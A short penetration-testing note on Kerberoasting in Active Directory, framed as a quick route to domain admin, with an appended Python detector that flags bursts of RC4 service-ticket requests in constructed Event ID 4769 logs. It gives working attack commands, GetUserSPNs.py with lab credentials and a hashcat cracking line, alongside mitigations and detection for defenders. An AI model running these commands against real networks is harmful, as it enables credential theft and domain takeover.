Quick way to get domain admin in network

Kerberos is an authentication method. When a user logs on to Active Directory, the user authenticates to the Domain Controller (DC) using the user's password, which of course the DC knows.


Kerberoasting attack

GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 10.10.10.250 -request

Cracking the hash

hashcat -m 13100 kerberos.txt rockyou.txt

Mitigation

Strong passwords

Least privilege

Don't run service accounts as domain admin
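Added detection example, not part of the original note: the GetUserSPNs step above shows up in the DC's Security log as Event ID 4769 entries where one account requests RC4 (TicketEncryptionType 0x17, the etype hashcat mode 13100 cracks) service tickets for many SPN-bearing accounts in a short window. The records below are constructed sample data with real 4769 field names; the window and threshold values are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Event ID 4769 (Kerberos service ticket requested) records.
# Field names are the real Security-log names; the values are made up.
SAMPLE_4769 = [
    {"time": "2024-01-10T09:00:01", "TargetUserName": "fcastle@MARVEL.LOCAL",
     "ServiceName": "SQLService", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.15"},
    {"time": "2024-01-10T09:00:02", "TargetUserName": "fcastle@MARVEL.LOCAL",
     "ServiceName": "HTTPService", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.15"},
    {"time": "2024-01-10T09:00:03", "TargetUserName": "fcastle@MARVEL.LOCAL",
     "ServiceName": "BackupSvc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.15"},
    {"time": "2024-01-10T09:00:04", "TargetUserName": "fcastle@MARVEL.LOCAL",
     "ServiceName": "WS01$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.15"},
    {"time": "2024-01-10T09:30:00", "TargetUserName": "pparker@MARVEL.LOCAL",
     "ServiceName": "SQLService", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.20"},
    {"time": "2024-01-10T11:30:00", "TargetUserName": "pparker@MARVEL.LOCAL",
     "ServiceName": "HTTPService", "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.20"},
]

RC4_HMAC = "0x17"  # etype 23: the ticket type hashcat -m 13100 cracks


def is_roastable_request(ev):
    """RC4 service ticket for a user-owned SPN (machine accounts and krbtgt excluded)."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def find_kerberoast_candidates(events, window_minutes=10, min_services=3):
    """Return {requester: sorted services} for each requester that obtained RC4
    tickets for at least min_services distinct service accounts inside one window."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            by_user[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    window = timedelta(minutes=window_minutes)
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):  # sliding window from each request
            seen = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(seen) >= min_services:
                flagged[user] = sorted(seen)
                break
    return flagged


if __name__ == "__main__":
    for user, services in find_kerberoast_candidates(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {services}")
```

Pairing this with an audit of which SPN-bearing accounts still allow RC4 and which sit in Domain Admins covers the mitigation list above from the detection side.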